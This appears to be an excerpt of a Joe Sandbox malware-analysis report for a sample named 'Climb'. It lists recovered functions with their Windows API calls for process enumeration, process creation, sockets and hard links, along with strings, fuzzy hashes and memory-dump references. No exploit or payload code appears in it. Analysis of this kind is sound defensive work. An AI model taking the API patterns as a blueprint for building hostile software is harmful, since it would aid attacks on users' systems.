Opcode ID: 2c5018c522cb4acdfa0a28c04a9ef715f06c5f5dac160814991ac1e1700f1df4
Instruction ID: 04be2efe8ed016124fca440e61611e219d2f49826606e3251258acea96068e6e
Opcode Fuzzy Hash: 2c5018c522cb4acdfa0a28c04a9ef715f06c5f5dac160814991ac1e1700f1df4
Instruction Fuzzy Hash: C5317374A00209AFDB10DF54C885EAA7BF8FF45308F144099F909EB262DB75EE45DB61

Function 00588305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00588339
EnumChildWindows.USER32(?,0058802F,00000000), ref: 005883B0

Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0

Strings

(\, xrefs: 00588317
(\, xrefs: 0058834A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: (\$(\
API String ID: 3814560230-1456765959
Opcode ID: 55aad0d72586b366546479c8db19cd0b9e127c16d3b76bdf497b2d353087f159
Instruction ID: 1164db3ec77c12375ffe800fe7561f3eb6bba049f9a55875efb89c8bcac34777
Opcode Fuzzy Hash: 55aad0d72586b366546479c8db19cd0b9e127c16d3b76bdf497b2d353087f159
Instruction Fuzzy Hash: E2212875200705DFC724EF69D840AA6BBF5FF59760F600A19E879A73A0DF70A844DB60

Function 00584C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00584CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00584D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00584D0F

Strings

msctls_trackbar32, xrefs: 00584CC4

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 763676e8b368fc6aaf850c3da5ca2e8fa7245ac2deaea79c51e367fd812c3a84
Instruction ID: 7e28f3dbb3bcad0bcb92a01c2196aecedcc78871ecabda3ff4651256d74796ef
Opcode Fuzzy Hash: 763676e8b368fc6aaf850c3da5ca2e8fa7245ac2deaea79c51e367fd812c3a84
Instruction Fuzzy Hash: 0811CE71240249BEEF206E69CC06FAB3BACFB85B69F110518FE51E20A0C671EC519B20

Function 0055389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A

Part of subcall function 005536F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00553712
Part of subcall function 005536F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00553723
Part of subcall function 005536F4: GetCurrentThreadId.KERNEL32 ref: 0055372A
Part of subcall function 005536F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00553731

GetFocus.USER32 ref: 005538C4

Part of subcall function 0055373B: GetParent.USER32(00000000), ref: 00553746

GetClassNameW.USER32(?,?,00000100), ref: 0055390F
EnumChildWindows.USER32(?,00553987), ref: 00553937

Strings

%s%d, xrefs: 0055394B

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 84a130646399ee8563053e6c8bb330fa4a3e596d8646a8471433869b084289e7
Instruction ID: ac57848f59bea648ada2299acfcdd3fd02001a734cfadf3dd30a3d780563cc28
Opcode Fuzzy Hash: 84a130646399ee8563053e6c8bb330fa4a3e596d8646a8471433869b084289e7
Instruction Fuzzy Hash: C611D5B16002096BCF11BF748C99AED7FB9BF94384F00406ABD0DAB292DE7059099B30

Function 004F59FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 004F5A34
DestroyWindow.USER32(?,004F37B8,?,?,?,?,?,004F3709,?,?), ref: 004F5A91

Strings

<)\, xrefs: 004F5A09
<)\, xrefs: 00534F34

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: <)\$<)\
API String ID: 2587070983-190169285
Opcode ID: 164adc2c035a8c1cbb1d86c7c37f6882bc4eb36d2b34c22f6173ec0b42f532ca
Instruction ID: 11111b46685644aadfb3baa8cfea49bf35fae0668f66e9e4bd3d80a33c1df3a0
Opcode Fuzzy Hash: 164adc2c035a8c1cbb1d86c7c37f6882bc4eb36d2b34c22f6173ec0b42f532ca
Instruction Fuzzy Hash: 8021F930606E09CFDB189B15E894F3537F0BB64715F04915EEA0297360DB389C99EB1A

Function 00586321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00586360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0058638D
DrawMenuBar.USER32(?), ref: 0058639C

Strings

0, xrefs: 0058632E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 83d1df7c21aafe5a7b447e7806c3bd6daa64599d8c8b1614d8895d1e743ec9ca
Instruction ID: 80b37c88d40f3541b688a4463326a780b21b563be6dd31312b7a50738ee04b45
Opcode Fuzzy Hash: 83d1df7c21aafe5a7b447e7806c3bd6daa64599d8c8b1614d8895d1e743ec9ca
Instruction Fuzzy Hash: 90016D71600218AFEB11AF11DC88BEE7FB5FB44351F10849AE949E6190DF708A85EF31

Function 0058823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,005C28E0,0058AD55,000000FC,?,00000000,00000000,?), ref: 0058823F
GetFocus.USER32 ref: 00588247

Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0

Part of subcall function 004F2234: GetWindowLongW.USER32(?,000000EB), ref: 004F2242

SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 005882B4

Strings

(\, xrefs: 00588254

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: (\
API String ID: 3601265619-3685820393
Opcode ID: 877e578d8a9f5caf600c07e9d947c8f3be43f58d6522ef17f197ef64039b0eab
Instruction ID: cd1b82fa2ce65d4a0c1e4374c34bf78fb8eed9fef7e6b979ccfcfc0d287a9f11
Opcode Fuzzy Hash: 877e578d8a9f5caf600c07e9d947c8f3be43f58d6522ef17f197ef64039b0eab
Instruction Fuzzy Hash: D4019E35202900CFD324DB68D944A7A37E6FB89324F1802ADE912972A0CF306C4BDB50

Function 00588526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

DestroyAcceleratorTable.USER32(?), ref: 00588576
CreateAcceleratorTableW.USER32(00000000,?,?,?,0056BE96,00000000,00000000,?,00000001,00000002), ref: 0058858C
GetForegroundWindow.USER32(?,0056BE96,00000000,00000000,?,00000001,00000002), ref: 00588595

Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0

Strings

(\, xrefs: 00588532

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
String ID: (\
API String ID: 986409557-3685820393
Opcode ID: 2fbbf8d9536c495e4d09f41ab16e63a50e184fefd1e37ca60562eadf669c4150
Instruction ID: b96793738d67831f726819eb2487fddb57f3f8b0e3deb7e107f0c5c1c8d5a597
Opcode Fuzzy Hash: 2fbbf8d9536c495e4d09f41ab16e63a50e184fefd1e37ca60562eadf669c4150
Instruction Fuzzy Hash: 92012931601B04EFCB24AF69EC88A653BF1FB24325F50451EF911A62B0DB30A998EB50

Function 00588BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005C4038,005C407C), ref: 00588C1A
CloseHandle.KERNEL32 ref: 00588C2C

Strings

|@\, xrefs: 00588BE5
8@\, xrefs: 00588BD6

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: 8@\$|@\
API String ID: 3712363035-340060010
Opcode ID: a8132e64669b17ad3e872917b1f0983dd7221e05a4f0fef56c96c1aa3bff7e9c
Instruction ID: dcf67172755d6fe7fdc523d50ed24b9a44c4f64d18f2bb2cf3bc8bb6ad0fd202
Opcode Fuzzy Hash: a8132e64669b17ad3e872917b1f0983dd7221e05a4f0fef56c96c1aa3bff7e9c
Instruction Fuzzy Hash: 86F030B2681604BEF7106B616C5DFB73EACFB24350F010421BF08F9191DA654C149BB9

Function 0054E778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0054E797
FreeLibrary.KERNEL32 ref: 0054E7BD

Strings

X64, xrefs: 0054E680
GetSystemWow64DirectoryW, xrefs: 0054E791

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: e8c446c5321159ac1b5ac79280fe6586273ee90d74151eb1cd34f468123fa30d
Instruction ID: 99de39592c0b17ee7aa01685c1384d8241218154d821b18882ba40e8208eb5a2
Opcode Fuzzy Hash: e8c446c5321159ac1b5ac79280fe6586273ee90d74151eb1cd34f468123fa30d
Instruction Fuzzy Hash: A3E02B719026119FD77156205C8AFEA3FA87F20B14F250D58EC41F6090DB34CC88C764

Function 0055096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c39a7a99a2e8618106ff9bfde652132dc4649d755a16b5f0d28db604adec9ff2
Instruction ID: 668b797fdde0b76f740a13e155e69d48eb37c89d92203e6e8681d5400fc7b69a
Opcode Fuzzy Hash: c39a7a99a2e8618106ff9bfde652132dc4649d755a16b5f0d28db604adec9ff2
Instruction Fuzzy Hash: A9C19E75A00206EFCB14CF94C8A4EAEBBB5FF48715F109599E805EB291D730EE85DB90

Function 005241F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0052427E
__alldvrm.LIBCMT ref: 0052447F
__alldvrm.LIBCMT ref: 005244A1

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: 7f2c6a685799c65f44405e8b7789113a9c0536fe24ddcda2b2005973b5eb49d5
Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: 32A157729007A69FDB11DF18E8917AEBFE4FF62310F1445A9E5959B2C1C2349981CF90

Function 00550D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00590BD4,?), ref: 00550EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00590BD4,?), ref: 00550EF8
CLSIDFromProgID.OLE32(?,?,00000000,0058DCE0,000000FF,?,00000000,00000800,00000000,?,00590BD4,?), ref: 00550F1D
_memcmp.LIBVCRUNTIME ref: 00550F3E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 0077424b23d58709d71a8bee73e5be3d73b1f11b39c0b2d438eb0821f75c8d53
Instruction ID: 44d68695076eb3df186581109e43e0c94ab8f582ea1b6ca80fe7b9d459c23618
Opcode Fuzzy Hash: 0077424b23d58709d71a8bee73e5be3d73b1f11b39c0b2d438eb0821f75c8d53
Instruction Fuzzy Hash: AC81FC71A00109EFCB14DFD4C994DEEBBB9FF89315F204559E906AB290DB71AE09CB60

Function 0057B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0057B10C
Process32FirstW.KERNEL32(00000000,?), ref: 0057B11A

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

Process32NextW.KERNEL32(00000000,?), ref: 0057B1FC
CloseHandle.KERNEL32(00000000), ref: 0057B20B

Part of subcall function 0050E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00534D73,?), ref: 0050E395

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 14d2d9537ee0ef9bf09b8ff1190246982e1ddd9574e615a8115eb3108f47d986
Instruction ID: f3ed0b4290df7042f1f7c7f9798de4997c5046b8f3f48597eee6f20491e2a8a6
Opcode Fuzzy Hash: 14d2d9537ee0ef9bf09b8ff1190246982e1ddd9574e615a8115eb3108f47d986
Instruction Fuzzy Hash: 93517C71508305AFD310EF25C886A6FBBE8FF89758F40491EF58997291DB34D904CB92

Function 00531711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00531840

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7f36457e5f319f74a49b91c19b8e0ed7ec5cc17c4d1b7f91366d4a05a74a6680
Instruction ID: ad7777c7623b6c86fbff6cca73848d1f4862a4738abe6a4cbd81c329324d0a7b
Opcode Fuzzy Hash: 7f36457e5f319f74a49b91c19b8e0ed7ec5cc17c4d1b7f91366d4a05a74a6680
Instruction Fuzzy Hash: 4D415D31600912ABEB207FBD9C4AABE7FA4FF82370F180635F819D62D1DA354C41576A

Function 00572533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 0057255A
WSAGetLastError.WSOCK32 ref: 00572568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 005725E7
WSAGetLastError.WSOCK32 ref: 005725F1

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 81a7fffc2d6d7fc4eea14e368ddc3fffdeae5f3473414bc9c07e10a05c65e209
Instruction ID: e2d67f82e054b8ca2fed43fd62e6a890f431ac676c37040c9a74f1dbaf88a971
Opcode Fuzzy Hash: 81a7fffc2d6d7fc4eea14e368ddc3fffdeae5f3473414bc9c07e10a05c65e209
Instruction Fuzzy Hash: 64410434A00200AFE720AF24C886F2A3BE5BB44718F94C44DFA199F2D2C775ED41CB91

Function 00586CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00586D1A
ScreenToClient.USER32(?,?), ref: 00586D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00586DBA

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 182d9235fc982fbc43d3d5ba0d3cf10d574c35a5dc2ede12c282e2d951096e63
Instruction ID: 113596b728e99152caf547606a5f1ebe2208cc84357537dbc28f6c9df377031f
Opcode Fuzzy Hash: 182d9235fc982fbc43d3d5ba0d3cf10d574c35a5dc2ede12c282e2d951096e63
Instruction Fuzzy Hash: 89512A74A01209EFCF24EF64D980AAE7BB6FF54320F208559FD55AB290D770AD81DB90

Function 0052B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6cd11bb808e08261650171903a7fae37913c8b48ffb5070a69f52826fa0fc04
Instruction ID: 34dc93df13fe6b39335e84b9265317be682b9851d8a8163c9f48c2b124251d43
Opcode Fuzzy Hash: f6cd11bb808e08261650171903a7fae37913c8b48ffb5070a69f52826fa0fc04
Instruction Fuzzy Hash: 20410475A00714AFE724AF78DC45BAABFE8FF89710F10852AF115DB2D1D37299418B80

Function 0056611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 005661C8
GetLastError.KERNEL32(?,00000000), ref: 005661EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00566213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0056623F

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
